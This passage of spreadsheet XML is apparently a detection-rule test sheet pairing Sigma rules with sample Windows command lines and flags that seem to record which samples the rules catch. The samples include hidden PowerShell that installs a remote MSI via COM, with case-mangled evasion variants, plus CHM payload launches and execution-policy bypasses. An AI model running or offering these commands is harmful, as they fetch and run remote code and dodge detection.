          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C1276" s="44" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D1276" s="44" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E1276" s="4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76" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1276" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1276" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1276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276" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1276" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1277" ht="15.75" customHeight="1" s="42">
      <c r="A1277" s="44" t="inlineStr">
        <is>
          <t>t1027.010</t>
        </is>
      </c>
      <c r="B1277" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C1277" s="44" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D1277" s="44" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E1277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77" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1277" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1277" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I127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277" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1277" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1278" ht="15.75" customHeight="1" s="42">
      <c r="A1278" s="44" t="inlineStr">
        <is>
          <t>t1027.010</t>
        </is>
      </c>
      <c r="B1278" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C1278" s="44" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D1278" s="44" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E1278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78" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1278" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1278" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1278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278" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1278" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1279" ht="15.75" customHeight="1" s="42">
      <c r="A1279" s="44" t="inlineStr">
        <is>
          <t>t1027.010</t>
        </is>
      </c>
      <c r="B1279" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C1279" s="44" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D1279" s="44" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E1279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79" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1279" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1279" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1279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279" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1279" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1280" ht="15.75" customHeight="1" s="42">
      <c r="A1280" s="44" t="inlineStr">
        <is>
          <t>t1027.010</t>
        </is>
      </c>
      <c r="B1280" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C1280" s="44" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D1280" s="44" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E1280" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -WindowStyle Hidden -Command "$u='https://example.com/test.msi'; $i=New-Object -ComObject ('W' + 'indowsInstaller.Installer'); $i.UILevel=2; $i.InstallProduct($u, '')"</t>
        </is>
      </c>
      <c r="F1280" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1280" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1280" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1280" s="43" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location (222720a7-047f-4054-baa5-bab9be757db0)</t>
        </is>
      </c>
      <c r="J1280" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1280" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1281" ht="15.75" customHeight="1" s="42">
      <c r="A1281" s="44" t="inlineStr">
        <is>
          <t>t1027.010</t>
        </is>
      </c>
      <c r="B1281" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C1281" s="44" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D1281" s="44" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E1281" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -WIndoWStYle Hidden -c "$u='https://example.com/test.msi'; $i=New-Object -ComObject ('W' + 'indowsInstaller.Installer'); $i.UILevel=2; $i.InstallProduct($u, '')"</t>
        </is>
      </c>
      <c r="F1281" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1281" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1281" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1281" s="43" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location (222720a7-047f-4054-baa5-bab9be757db0)</t>
        </is>
      </c>
      <c r="J1281" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1281" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1282" ht="15.75" customHeight="1" s="42">
      <c r="A1282" s="44" t="inlineStr">
        <is>
          <t>t1027.010</t>
        </is>
      </c>
      <c r="B1282" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C1282" s="44" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D1282" s="44" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E1282" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -wInDowsTyLe Hidden -COmMANd "$u='https://example.com/test.msi'; $i=New-Object -ComObject ('W' + 'indowsInstaller.Installer'); $i.UILevel=2; $i.InstallProduct($u, '')"</t>
        </is>
      </c>
      <c r="F1282" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1282" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1282" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1282" s="43" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location (222720a7-047f-4054-baa5-bab9be757db0)</t>
        </is>
      </c>
      <c r="J1282" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1282" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1283" ht="15.75" customHeight="1" s="42">
      <c r="A1283" s="44" t="inlineStr">
        <is>
          <t>t1027.010</t>
        </is>
      </c>
      <c r="B1283" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C1283" s="44" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D1283" s="44" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E1283" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -WInDowSTYLE Hidden -cOmmaND "$u='https://example.com/test.msi'; $i=New-Object -ComObject ('W' + 'indowsInstaller.Installer'); $i.UILevel=2; $i.InstallProduct($u, '')"</t>
        </is>
      </c>
      <c r="F1283" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1283" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1283" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1283" s="43" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location (222720a7-047f-4054-baa5-bab9be757db0)</t>
        </is>
      </c>
      <c r="J1283" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1283" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1284" ht="15.75" customHeight="1" s="42">
      <c r="A1284" s="44" t="inlineStr">
        <is>
          <t>t1027.010</t>
        </is>
      </c>
      <c r="B1284" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C1284" s="44" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D1284" s="44" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E1284" s="4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284" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1284" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1284" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1284" s="43" t="n"/>
      <c r="J1284" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1284" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1285" ht="15.75" customHeight="1" s="42">
      <c r="A1285" s="43" t="inlineStr">
        <is>
          <t>t1027.010</t>
        </is>
      </c>
      <c r="B1285" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C1285" s="43" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D1285" s="43" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E1285" s="43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285" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1285" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1285" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1285" s="43" t="n"/>
      <c r="J1285" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1285" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1286" ht="15.75" customHeight="1" s="42">
      <c r="A1286" s="44" t="inlineStr">
        <is>
          <t>t1027.010</t>
        </is>
      </c>
      <c r="B1286" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C1286" s="44" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D1286" s="44" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E1286" s="4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1286" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1286" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1286" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1286" s="43" t="n"/>
      <c r="J1286" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1286" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1287" ht="15.75" customHeight="1" s="42">
      <c r="A1287" s="44" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B1287" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_werfault_reflect_debugger_exec</t>
        </is>
      </c>
      <c r="C1287" s="44" t="inlineStr">
        <is>
          <t>Potential ReflectDebugger Content Execution Via WerFault.EXE</t>
        </is>
      </c>
      <c r="D1287" s="44" t="inlineStr">
        <is>
          <t>fabfb3a7-3ce1-4445-9c7c-3c27f1051cdd</t>
        </is>
      </c>
      <c r="E1287" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\WerFault.exe -prC:\Windows\System32\notepad.exe</t>
        </is>
      </c>
      <c r="F1287" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1287" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1287" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1287" s="44" t="n"/>
      <c r="J1287" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K1287" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1288" ht="15.75" customHeight="1" s="42">
      <c r="A1288" s="44" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B1288" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1288" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1288" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1288" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c start "" "C:\Users\Public\WP.exe"</t>
        </is>
      </c>
      <c r="F1288" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1288" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1288" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1288" s="44" t="n"/>
      <c r="J1288" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K1288" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1289" ht="15.75" customHeight="1" s="42">
      <c r="A1289" s="44" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B1289" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1289" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1289" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1289" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c Start C:\Temp\WinPwn_Tool.exe -recon</t>
        </is>
      </c>
      <c r="F1289" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1289" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1289" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1289" s="44" t="n"/>
      <c r="J1289" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K1289" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1290" ht="15.75" customHeight="1" s="42">
      <c r="A1290" s="44" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B1290" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1290" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1290" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1290" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ep bypass -file C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F1290" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1290" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1290" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1290" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J1290" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1290" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1291" ht="15.75" customHeight="1" s="42">
      <c r="A1291" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B1291" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1291" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1291" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1291" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -file C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F1291" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1291" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1291" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1291" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J1291" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1291" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1292" ht="15.75" customHeight="1" s="42">
      <c r="A1292" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B1292" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1292" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1292" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1292" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -fiLE C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F1292" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1292" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1292" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1292" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J1292" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1292" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1293" ht="15.75" customHeight="1" s="42">
      <c r="A1293" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B1293" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1293" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1293" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1293" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -eP bypass -fiLe C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F1293" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1293" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1293" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1293" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J1293" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1293" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1294" ht="15.75" customHeight="1" s="42">
      <c r="A1294" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B1294" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1294" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1294" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1294" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -FilE C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F1294" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1294" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1294" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1294" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J1294" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1294" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1295" ht="15.75" customHeight="1" s="42">
      <c r="A1295" s="43" t="n"/>
      <c r="B1295" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1295" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1295" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1295" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\malicious.chm</t>
        </is>
      </c>
      <c r="F1295" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1295" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1295" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1295" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J1295" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1295" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1296" ht="15.75" customHeight="1" s="42">
      <c r="A1296" s="43" t="n"/>
      <c r="B1296" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1296" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1296" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1296" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\help_document.chm</t>
        </is>
      </c>
      <c r="F1296" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1296" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1296" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1296" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J1296" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1296" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1297" ht="15.75" customHeight="1" s="42">
      <c r="A1297" s="43" t="n"/>
      <c r="B1297" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1297" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1297" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1297" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\Users\Victim\APPDAT~1\Local\Temp\malicious.chm</t>
        </is>
      </c>
      <c r="F1297" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1297" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1297" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I129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297" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1297" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1298" ht="15.75" customHeight="1" s="42">
      <c r="A1298" s="43" t="n"/>
      <c r="B1298" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1298" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1298" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1298" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\Windows\System32\oobe\msoobe.chm</t>
        </is>
      </c>
      <c r="F1298" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1298" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1298" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1298" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J1298" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1298" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1299" ht="15.75" customHeight="1" s="42">
      <c r="A1299" s="43" t="n"/>
      <c r="B1299" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1299" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1299" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1299" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\document.chm</t>
        </is>
      </c>
      <c r="F1299" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1299" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1299" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1299" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J1299" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1299" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1300" ht="15.75" customHeight="1" s="42">
      <c r="A1300" s="43" t="n"/>
      <c r="B1300" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1300" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1300" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1300" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F1300" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1300" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1300" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1300" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J1300" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1300" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1301" ht="15.75" customHeight="1" s="42">
      <c r="A1301" s="43" t="n"/>
      <c r="B1301" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1301" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1301" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1301" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /C cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F1301" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1301" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1301" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1301" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J1301" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1301" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1302" ht="15.75" customHeight="1" s="42">
      <c r="A1302" s="43" t="n"/>
      <c r="B1302" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1302" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1302" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1302" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /"c" cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F1302" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1302" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1302" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1302" s="43" t="n"/>
      <c r="J1302" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1302" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1303" ht="15.75" customHeight="1" s="42">
      <c r="A1303" s="43" t="n"/>
      <c r="B1303" s="44" t="inlineStr">
        <is>
